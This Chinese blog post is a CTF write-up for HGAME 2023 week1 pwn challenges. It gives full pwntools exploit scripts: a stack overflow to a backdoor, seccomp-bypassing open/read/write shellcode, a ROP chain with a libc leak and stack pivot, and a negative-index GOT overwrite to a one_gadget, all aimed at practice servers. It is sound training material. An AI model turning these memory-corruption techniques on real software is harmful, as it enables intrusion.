[HGAME 2023 week1] PWN 复现

已于 2023-10-13 18:09:58 修改
阅读量1k 收藏 2
点赞数 2
分类专栏: PWN 文章标签: 网络安全
于 2023-09-04 17:25:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzzzz911/article/details/132669975
版权

目录

test_nc

easy_overflow

simple_shellcode

choose_the_seat

orw

test_nc

签到题

nc  一下

cat  flag

easy_overflow

经典的栈溢出,但有一点需要注意close(1)这是文件关闭了标准输出流,从而需要打开才能获得shell,exp如下:

from pwn import *

io =remote('node2.anna.nssctf.cn',28203)

backdoor =0x40117E

payload =b'A'*(0X10 +8) +p64(backdoor)

io.sendline(payload)
io.interactive()

simple_shellcode

首先ida一下,可以很明显的了解到跟沙盒有关,再查一下沙盒机制,显然不能直接构造orw,再加上read所存储的字节数少,不能直接构造,所以可以在mmap上面来构造orw

mmap函数解析:

exp如下:

from pwn import *
context.arch="amd64"
context.log_level="debug"
p=remote('node1.anna.nssctf.cn',28291)
#p=process("./shellcode")
p.recvuntil("shellcode:\n")

mmap_addr =0xcafe0000

shellcode=shellcraft.open("./flag")
shellcode+=shellcraft.read(3,mmap_addr+0x100,0x50)
shellcode+=shellcraft.write(1,mmap_addr+0x100,0x50)
shellcode=asm(shellcode)

p.send(asm("xor rdi,rdi;mov rsi,0xcafe000f;syscall;"))
print(len(asm("xor rdi,rdi;mov rsi,0xcafe000f;syscall;")))

p.send(shellcode)
p.interactive()

orw

先ida一下,可以看出来需要进行栈迁移,并且还存在沙盒,还有一段0x30的空间(溢出的空间较大),这就是为什么exp和[NSSCTF Round#14 Basic] rbp 不一样的原因,可溢出的空间不同,导致所利用的条件不同

先泄露libc,再把orw写在自己确定的bss段,再用 leave ret 转到bss段,执行orw

exp如下:

from pwn import *
context.log_level="debug"

#p=process("./orw")
p=remote('node5.anna.nssctf.cn',28392)
elf=ELF("111")
libc=ELF("libc-2.31.so")

pop_rdi_ret=0x401393
pop_rsi_r15_ret=0x401391
bss_addr=elf.bss(0x800)
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
vuln_addr=0x4012c0
leave_ret=0x4012be
read=0x4012CF

p.recvuntil("task.\n")
payload=b'a'*(0x100+8)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
p.send(payload)

puts_addr=u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
libc_base=puts_addr-libc.sym["puts"]

open_addr=libc_base+libc.sym["open"]
read_addr=libc_base+libc.sym["read"]
write_addr=libc_base+libc.sym["write"]
pop_rsi_ret=libc_base+0x2601f
pop_rdx_ret=libc_base+0x142c92
print("libc_base-->"+hex(libc_base))

payload=b'a'*(0x100)+p64(bss_addr+0x100)+p64(read)  

payload=b'./flag'.ljust(8,b'\x00')
payload+=p64(pop_rdi_ret)+p64(bss_addr)+p64(pop_rsi_ret)+p64(0)+p64(pop_rdx_ret)+p64(0)+p64(open_addr)
payload+=p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(bss_addr+0x200)+p64(pop_rdx_ret)+p64(0x50)+p64(read_addr)
payload+=p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(bss_addr+0x200)+p64(pop_rdx_ret)+p64(0x50)+p64(write_addr)
payload=payload.ljust(0x100,b'\x00')
payload+=p64(bss_addr)+p64(leave_ret)

p.send(payload)
p.interactive()

 choose_the_seat

这题有点难,不太会写,此题存在数组越界(下次懂了再来)

from pwn import *
#p=process("./choose")
p=remote('node5.anna.nssctf.cn',28620)
libc=ELF("libc-2.31.so")
main_addr=0x4011d6

p.recvuntil("one.\n")
p.sendline("-6")
p.recvuntil("name\n")
p.send(p64(main_addr))

p.recvuntil("one.\n")
p.sendline("-8")
p.recvuntil("name\n")
p.send(b'a'*8)
p.recvuntil(b'a'*8)
printf_addr=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
libc_base=printf_addr-libc.sym["printf"]
system_addr=libc_base+libc.sym["system"]
one_gadget=libc_base+0xe3b01
print("libc_base-->"+hex(libc_base))

p.recvuntil("one.\n")
p.sendline("-6")
p.recvuntil("name\n")

p.send(p64(one_gadget))
p.interactive()

Xzzzz911
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
PWN · ORW | shellcode】[HGAME 2023 week1]simple_shellcode
Mr_Fmnwon的博客
01-04 670
注意,对于第一次输入的限制,这里刻意的打印了两种shellcode的长度。
hgame2023 week1 writeup
01-15 4231
hgame2023 WEEK1
pwn】[HGAME 2023 week1]simple_shellcode --orw利用攻击
question55的博客
11-11 165
先查看程序的保护状态可以看到,保护全开,拖进ida看主函数的逻辑可以看到有个mmap函数:mmap() 函数是Unix和类Unix操作系统中的一个系统调用,用于在进程的地址空间中映射文件或者其它对象。这样做的好处是可以让文件直接映射到内存中,从而避免了频繁的文件 I/O 操作,提高了文件的读取效率。mmap() 函数的一般形式如下:c复制代码void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);参数说
2021-NCTF pwn方向题目复现
Amalllの博客
12-01 3467
周末在学校摸鱼了所以没有参加比赛,赛后看题又一次深刻的感觉到自己有多菜了(被新生赛暴打的大二菜狗子 1、easyheap 算是pwn的签到题目了,从libc2.32起加了一个异或的保护,不过因为uaf漏洞点外加并没有啥其他的限制所以利用起来没有什么难度 from pwn import * context.log_level = 'debug' r = lambda : p.recv() rx = lambda x: p.recv(x) ru = lambda x: p.recvuntil(..
2023羊城杯--pwn-heap复现
fuiifiuiii的博客
09-26 267
​ 可以看到,配合new(0x62)或(0x68)以后,delete(这里仅仅是为了达成能够往下修改的效果),然后连续创建两个(0x58),可以覆盖0x60,然后刚好达到第二堆块的index_chunk区域,从而修改指针。另外:这里被free掉的堆块也不会被再次使用,能够正确覆写的原因就是这个堆管理的表(也就是用了第一个堆来存储用到的堆的数据域的地址)可能发现用它的过程:从strtok的调用中,si进入发现got表跳转的第一个函数是它,然后用libc找到相应的位置,进行更改。
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
hgame:Haskell 游戏引擎
05-30
1. **Haskell语言基础**:Haskell是一种静态类型的、纯函数式的编程语言,它的核心理念是避免副作用,强调计算的数学性质。开发者需要理解函数的柯里化、类型推导、模式匹配、monads等概念,这些都是编写Hgame引擎的...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
0hgame:用0h制作的游戏->阅读README
05-01
(对于那些谁是它asceptical, ) 规则: 1- No one talk about fight club (?)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king ...
单表替换密码算法破解工具
01-15
网络密码中介绍的基本加密方法,与凯撒密码相似,该软件提供基本的替换功能
roarctf_2019_easy_pwn
hanabi_sh
12-20 526
buuctf pwn roarctf_2019_easy_pwn off-by-one
[HGAME 2023 week1]choose_the_seat 个人wp
qq_23730003的博客
03-27 760
进入到vuln函数,发现这里判断v0并没有考虑负数,存在漏洞点,若将v0设为负数,&seats[16*v0]将会是不合法地址,同时puts函数可以泄露该地址内容,考虑泄露libc,覆写puts函数的got表,这些操作不能一次输入完成,发现有exit函数,故可以把exit函数的got表地址更改为main函数地址,这样第一次输入后跳转到main函数继续执行vuln,就可以接受多次输入。第三次覆写puts函数的got表地址为system函数的真实地址,并传参"/bin/sh"。
[HGAME 2023 week1]encode
2303_79610394的博客
12-01 148
[HGAME 2023 week1]encode
PWN学习-ADworld刷题
WocW的博客
06-04 1592
前言 搁置了一段时间没更博,经历了考试还有一些其他事,决心好好去学pwn。学习的方法打算是按照看视频课加刷题加查找资料来学习。 先把新手题都刷了一遍,都是很入门的题目,没啥好提的,收获也少。然后去刷进阶的题,但是目前还没有遇到堆的题目,视频课已经快学完了,学习资料是看的B站上的这个,觉得讲的很好,YOTUBE上也有 讲一下刷进阶题时个人遇到的一些坑…或者是学到的东西 分析 pwn-100 检查...
几道pwn复现
weixin_44113469的博客
02-07 461
不记得是什么时候打的比赛,自己搭的博客崩了,搬来csdn记录一下 虎符CTF 复现 0x01 任意地址写 from pwn import* from sys import* p=remote('39.97.210.182',10055)#p=remote()39.97.210.182 10055 #p=process("./chall") elf=ELF('chall') #libc = ELF('libc6_2.27-3ubuntu1_amd64.so') #libc = ELF('./libc-2.23
pwn】2020GEEKPWN复现
weixin_43960998的博客
07-05 393
      参考师傅的博客,复现一手2020GEEKPWN。 1、babypwn 思路:       1)fb 泄漏 heap_base,通过堆溢出修改 size,释放进 ub,泄漏 libc       2)然后 ub attack,这里学到 ub attack 并不一定要分配,因为漏洞发生在解链,所以只要在 ub 中发生解链即
HGAME 2023 Week1
ph0ebus的博客
01-13 2289
Week1的大多数题对我这样的萌新还是很友好的,虽然但是还是很多没解出来,不过还是学到了蛮多东西,浅浅记录一下。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
pillow_heif-0.17.0-pp39-pypy39_pp73-macosx_14_0_arm64.whl
最新发布
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出现,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更复杂的图像处理和分析。
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加了从指定文件夹获取图片的功能: ```python import os from PIL import Image def get_images_from_folder(folder_path): images = [] for filename in os.listdir(folder_path): if filename.endswith(".png"): image_path = os.path.join(folder_path, filename) image = Image.open(image_path) images.append(image) return images # 指定文件夹路径 folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值